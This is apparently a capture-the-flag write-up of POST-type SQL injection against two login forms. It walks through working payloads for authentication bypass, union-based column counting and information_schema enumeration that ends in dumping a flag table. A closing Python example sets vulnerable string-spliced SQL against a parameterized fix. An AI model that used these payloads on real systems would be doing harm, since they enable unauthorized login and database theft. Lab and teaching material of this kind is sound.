SQL injection, POST type
Target range address:
Principle:
In POST injection the parameters are passed with POST; the data the user submits reaches the database query, and useful information is then extracted from the database through that query.
First question:
We first check the source code: the username is placed into the query directly without any processing. Therefore, we only need to close the quote in front of username and then comment out the rest of the query to interact with the database.
I enter in the account box:
' or 1=1 #
The page is displayed directly (the login succeeds).
So, to determine the number of fields, I input the following in turn:
'union select 1#
'union select 1,2#
'union select 1,2,3#
It is found that only the third one shows that the login is successful.
So the number of fields is 3.
Next, we use database() to query the database name, entering the following in turn:
'union select 1,2,database() limit 0,1 #
…
'union select 1,2,database() limit 9,1 #
error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
The database post_error is found among them; the flag is probably in it.
So continue to enter the code:
'union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #
Find the flag
Continue by looking up the column names of the flag table, entering the code:
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1 #
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 1,1 #
'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 2,1 #
It is found that it has two columns:
flag
id
Then, to find the flag, directly query the flag data by entering the code:
' union select 1,2,group_concat(flag) from flag#
So get the flag
Second question
The method is the same, but its source code is different.
We need to use:
") or 1=1 #
The login is successful, so there is a POST injection vulnerability.
I first judge the number of fields, entering the code in turn:
") union select 1#
")union select 1,2#
") union select 1,2,3#
There are three judgment fields.
Then, we use database() to query the database name, entering the following in turn:
")union select 1,2,database() limit 0,1 #
…
")union select 1,2,database() limit 9,1 #
error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
The database post_error is found among them; the flag is probably in it.
So continue to enter the code:
") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #
It is found that it has two columns:
flag
id
Then, to find the flag, directly query the flag data by entering the code:
") union select 1,2,group_concat(flag) from flag#
So I got the flag for the second question.
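The root cause in both questions is the same: the username is spliced into the SQL text, so the closing sequence the payload needs (' for the first question, ") for the second) simply mirrors how the source wraps the value. The following added example (not code from the challenge) reproduces that splicing against a constructed SQLite users table and puts the parameterized fix next to it; SQLite is assumed here, so the comment marker is -- rather than MySQL's #, and the wrappers are single-quoted.

```python
import sqlite3


def make_db():
    """Constructed sample users table; not the challenge's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password, wrap=("'", "'")):
    """Splice the input into the SQL text the way the challenge source does.
    wrap selects how the source wraps the value: ("'", "'") models the first
    question, ("('", "')") models the parenthesised form of the second one.
    The closing sequence an input needs is simply wrap[1]."""
    open_, close = wrap
    return (
        "SELECT id, username, password FROM users "
        f"WHERE username={open_}{username}{close} AND password={open_}{password}{close}"
    )


def login_vulnerable(conn, username, password, wrap=("'", "'")):
    # Anything in username that closes the wrapper and starts a comment
    # rewrites the WHERE clause; the password check is commented away.
    return conn.execute(build_vulnerable_query(username, password, wrap)).fetchall()


def login_safe(conn, username, password):
    # Placeholders ship the values separately from the SQL text, so quotes,
    # parentheses and comment markers in the input stay plain data.
    return conn.execute(
        "SELECT id, username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 -- "  # SQLite form of the page's ' or 1=1 # payload
    print(build_vulnerable_query(bypass, "x"))
    print("vulnerable:", login_vulnerable(db, bypass, "x"))  # admin row returned
    print("safe:      ", login_safe(db, bypass, "x"))        # []
```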